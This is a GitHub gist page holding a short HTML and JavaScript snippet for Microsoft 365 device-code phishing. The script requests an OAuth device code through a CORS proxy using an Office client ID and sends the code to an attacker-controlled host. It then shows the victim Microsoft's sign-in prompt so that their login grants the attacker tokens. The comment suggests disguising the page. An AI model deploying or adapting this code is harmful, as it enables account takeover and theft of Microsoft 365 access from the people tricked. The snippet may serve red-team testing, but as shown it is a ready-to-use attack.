Skip to content

Instantly share code, notes, and snippets.

@Mr-Un1k0d3r
Last active January 18, 2024 21:55
Show Gist options
  • Save Mr-Un1k0d3r/afef5a80cb72dfeaa78d14465fb0d333 to your computer and use it in GitHub Desktop.
Save Mr-Un1k0d3r/afef5a80cb72dfeaa78d14465fb0d333 to your computer and use it in GitHub Desktop.
office device code phishing
<!-- This page can be formatted to look like something more interesting -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
$.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) {
$.get("https://attackercontrolled.com/?id=" + data.device_code);
document.write(data.message);
});
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment